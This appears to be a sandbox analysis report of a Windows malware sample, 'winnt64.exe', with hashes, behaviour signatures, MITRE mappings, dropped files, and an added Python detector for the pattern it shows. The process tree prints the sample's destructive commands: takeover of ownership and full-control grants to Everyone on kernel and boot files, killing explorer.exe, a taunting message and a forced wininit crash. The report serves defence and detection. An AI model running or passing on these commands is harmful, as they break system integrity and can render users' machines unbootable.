Analysis

  • max time kernel
    136s
  • max time network
    99s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    01-07-2024 02:25

Errors

Reason
Machine shutdown

General

  • Target

    winnt64.exe

  • Size

    188KB

  • MD5

    aa992d93467882ff211f211495e6c545

  • SHA1

    75a1a182af719168b9ca7b9c42282b997f82d443

  • SHA256

    dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88

  • SHA512

    54d07b5f123b20128459de04694ed295275498c646fef596830c2c98ff1a8fa4741c95ce72be6d59a713fc6d7d7365c4f13eace2ed6bf357ebef44885b882d5d

  • SSDEEP

    3072:vV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPTYEbXEC+gwNDF/Kjs:it5hBPi0BW69hd1MMdxPe9N9uA069TBk

Malware Config

Signatures

  • Possible privilege escalation attempt 14 IoCs
  • Modifies file permissions 1 TTPs 14 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\winnt64.exe
    "C:\Users\Admin\AppData\Local\Temp\winnt64.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat C:\Users\Admin\AppData\Local\Temp\winnt64.exe"
      2⤵
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\ntoskrnl.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:856
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4176
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\hal.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:408
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\hal.dll" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3344
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\ci.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2964
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\ci.dll" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1992
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\winload.efi"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1676
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\winload.efi" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1612
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Program Files\WindowsApps"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4800
      • C:\Windows\system32\icacls.exe
        icacls "C:\Program Files\WindowsApps" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:540
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\SystemApps"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1724
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\SystemApps" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1576
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\ImmersiveControlPanel"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\ImmersiveControlPanel" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:916
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5000
      • C:\Windows\system32\notepad.exe
        notepad.exe
        3⤵
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3592
        • C:\Windows\System32\Taskmgr.exe
          "C:\Windows\System32\Taskmgr.exe"
          4⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4808
          • C:\Windows\System32\Taskmgr.exe
            "C:\Windows\System32\Taskmgr.exe" /1
            5⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2968
      • C:\Windows\system32\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • Delays execution with timeout.exe
        PID:4976
      • C:\Windows\system32\msg.exe
        msg * ITS TOO LATE TO REPAIR YOUR PC! I'VE PROBABLY HANGED YOUR PC HAHAHAHA
        3⤵
        PID:1840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell wininit
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:112
        • C:\Windows\system32\wininit.exe
          "C:\Windows\system32\wininit.exe"
          4⤵
          PID:4020
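The tree above is a single batch script (35C7.bat, run by cmd.exe PID 2912) that pairs `takeown /f` with `icacls … /grant everyone:F` on four boot-critical binaries (ntoskrnl.exe, hal.dll, ci.dll, winload.efi) and three protected directories, then kills explorer.exe. The detection logic below is an added example written for this page, not code from the sandbox or from the sample: it walks process-creation records (field names modelled on Sysmon Event ID 1 / Security 4688 and assumed, not taken from the report), recognises takeown and icacls-grant-to-Everyone on those protected paths, and correlates the two steps by parent PID so the chain is reported once per target. The sample events are constructed from the command lines in the tree plus two benign icacls records that must not fire.

```python
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass

# Targets re-ACLed in the sandbox run above (compared case-insensitively).
BOOT_CRITICAL = {"c:\\windows\\system32\\" + f for f in ("ntoskrnl.exe", "hal.dll", "ci.dll", "winload.efi")}
PROTECTED_DIRS = {r"c:\program files\windowsapps", r"c:\windows\systemapps", r"c:\windows\immersivecontrolpanel"}
# "/grant[:r] <principal>:[(inheritance flags)]F" where the principal is Everyone,
# by name or by its well-known SID S-1-1-0 (icacls spells SIDs as *S-1-...).
GRANT_EVERYONE_FULL = re.compile(
    r"/grant(?::r)?\s+(?:everyone|\*S-1-1-0):(?:\([A-Z]+\))*F\b", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record; field names are an assumption for this example."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def _args(cmdline: str) -> list[str]:
    """Tokenise a Windows command line, keeping double-quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def target_of(image: str, cmdline: str) -> str | None:
    """Return the normalised (lower-case) path a takeown or icacls command operates on."""
    tool = image.rsplit("\\", 1)[-1].lower()
    args = _args(cmdline)[1:]
    if tool == "takeown.exe":
        for i, a in enumerate(args[:-1]):
            if a.lower() == "/f":
                return args[i + 1].lower().rstrip("\\")
        return None
    if tool == "icacls.exe" and args and not args[0].startswith("/"):
        return args[0].lower().rstrip("\\")
    return None


def classify(target: str) -> str | None:
    """Name the protected class a path falls into, or None if it is not protected."""
    if target in BOOT_CRITICAL:
        return "boot-critical file"
    if target in PROTECTED_DIRS or any(target.startswith(d + "\\") for d in PROTECTED_DIRS):
        return "protected system directory"
    return None


def find_acl_tampering(events: list[ProcEvent]) -> list[dict]:
    """Flag takeown / icacls-grant-Everyone:F on protected targets, correlated by parent PID.

    A target that one parent both took ownership of and opened to Everyone is reported
    once as a high-severity 'takeown+icacls chain'; a lone step is reported as medium.
    """
    steps: dict[tuple[int, str], dict] = defaultdict(dict)
    for ev in events:
        tool = ev.image.rsplit("\\", 1)[-1].lower()
        if tool not in ("takeown.exe", "icacls.exe"):
            continue
        target = target_of(ev.image, ev.cmdline)
        kind = classify(target) if target else None
        if kind is None:
            continue
        if tool == "icacls.exe" and not GRANT_EVERYONE_FULL.search(ev.cmdline):
            continue  # a grant to a named user or group is not this pattern
        entry = steps[(ev.ppid, target)]
        entry["kind"] = kind
        entry[tool[:-4]] = ev.pid  # "takeown" or "icacls" -> pid of that step
    findings = []
    for (ppid, target), entry in sorted(steps.items()):
        present = [k for k in ("takeown", "icacls") if k in entry]
        findings.append({
            "ppid": ppid, "target": target, "kind": entry["kind"],
            "technique": "+".join(present) + (" chain" if len(present) == 2 else ""),
            "severity": "high" if len(present) == 2 else "medium",
            "pids": [entry[k] for k in present],
        })
    return findings


# Constructed sample: command lines and PIDs from the tree above, plus two benign records.
SAMPLE_EVENTS = [
    ProcEvent(2912, 1920, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat"'),
    ProcEvent(856, 2912, r"C:\Windows\system32\takeown.exe", r'takeown /f "C:\Windows\System32\ntoskrnl.exe"'),
    ProcEvent(4176, 2912, r"C:\Windows\system32\icacls.exe", r'icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F'),
    ProcEvent(1676, 2912, r"C:\Windows\system32\takeown.exe", r'takeown /f "C:\Windows\System32\winload.efi"'),
    ProcEvent(1612, 2912, r"C:\Windows\system32\icacls.exe", r'icacls "C:\Windows\System32\winload.efi" /grant everyone:F'),
    ProcEvent(4800, 2912, r"C:\Windows\system32\takeown.exe", r'takeown /f "C:\Program Files\WindowsApps"'),
    ProcEvent(540, 2912, r"C:\Windows\system32\icacls.exe", r'icacls "C:\Program Files\WindowsApps" /grant everyone:F'),
    ProcEvent(408, 2912, r"C:\Windows\system32\takeown.exe", r'takeown /f "C:\Windows\System32\hal.dll"'),  # no icacls yet
    ProcEvent(7001, 6000, r"C:\Windows\system32\icacls.exe", r'icacls "D:\Share\Reports" /grant CORP\alice:M'),  # benign
    ProcEvent(7002, 6000, r"C:\Windows\system32\icacls.exe", r'icacls "C:\Windows\System32\ci.dll" /grant *S-1-5-32-544:RX'),  # not Everyone
]

if __name__ == "__main__":
    for finding in find_acl_tampering(SAMPLE_EVENTS):
        print(finding)
```

On the constructed input this yields three high-severity chains (ntoskrnl.exe, winload.efi, WindowsApps) and one medium finding for the lone takeown on hal.dll, while the share-folder grant and the Administrators-only grant on ci.dll are ignored. The findings map to the T1222.001 entry the report lists below. Note that these commands already require an elevated token (the sandbox ran the sample as Admin), so the sandbox's "possible privilege escalation" label is about the ACL weakening itself: once Everyone holds Full control on ntoskrnl.exe or winload.efi, any later unprivileged process can overwrite them, so restoring ownership and ACLs is not enough without also verifying the file contents.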

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

  • T1222 File and Directory Permissions Modification (2)
  • T1222.001 Windows File and Directory Permissions Modification (1)

Discovery

  • T1082 System Information Discovery (2)
  • T1012 Query Registry (1)
  • T1120 Peripheral Device Discovery (1)

Downloads

      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
        Filesize

        64KB

        MD5

        c27c1374edd5b819ac9f67c91d286373

        SHA1

        6768048f19f4dd2a3ab401e9f0b57570601f24a8

        SHA256

        a2d78e1e44733d24842f4e3a4fb86abd35219df6f6e90393c59abe99e1bb9ec0

        SHA512

        82bda0747e2e965f9e7a24ae494342af3f96043609eee38db74d18a3da0ddb0c2dabbb23c3f9223e5d0e89256b0b7a4ae0a0537966dd57a181a4505ad8a462c3

      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
        Filesize

        4B

        MD5

        f49655f856acb8884cc0ace29216f511

        SHA1

        cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

        SHA256

        7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

        SHA512

        599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
        Filesize

        960B

        MD5

        4f55be8451c1090c2a54a50d79243cfb

        SHA1

        f1a94bc446b6ae32300ada858fb251667a17b71d

        SHA256

        1b8257869915ac04445cb4bfdc0e0fc03db80efb96da98c49e7cbc4097bc28a2

        SHA512

        b87403fc4ab05cd4dd092d0707cd0dd22f927c65dcf73bce6f6bf2731f0572e089697908eeb377617c9f2531fdb3a495087feafb31871ea9a6f472a45d9d20f6

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
        Filesize

        14KB

        MD5

        00b3ce0e658cf92f7ea6ed8e36f76966

        SHA1

        7109d316553b321577fe6090df84d7182aafa590

        SHA256

        76b1b9ebbd2b4b90dd4447c698ee7c76ef2a75399a0f33ccb79b1389f679378a

        SHA512

        eb7998a902bd25847219db3f1800efa94235ee2d62077468993160346255fcfa8acc1b2918aae01cf052c02b9e385b3ec3faf61a425d5924c6709586f87be893

      • C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat
        Filesize

        1KB

        MD5

        c7b7a1bdb6c0ed883395fb5c63fcf775

        SHA1

        2cb74dbd18ff3cb8d8df73abbb2e801964925348

        SHA256

        0d4be7c8c1ea9439dcd902e072da04a8b3cc0823c596749dbb8e23382973464c

        SHA512

        acc6bff3eca0c42f7fe410df3744a6d714ab2263aead18a1bed6e7a29772891bd190888b576e0044f7eebdff8a22903d821c486733792efd94e1d16d3380296d

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3tita52.edg.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/112-36-0x0000014AB3AA0000-0x0000014AB3AC2000-memory.dmp
        Filesize

        136KB

      • memory/4808-5-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-15-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-14-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-13-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-11-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-16-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-17-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-12-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-6-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

      • memory/4808-7-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB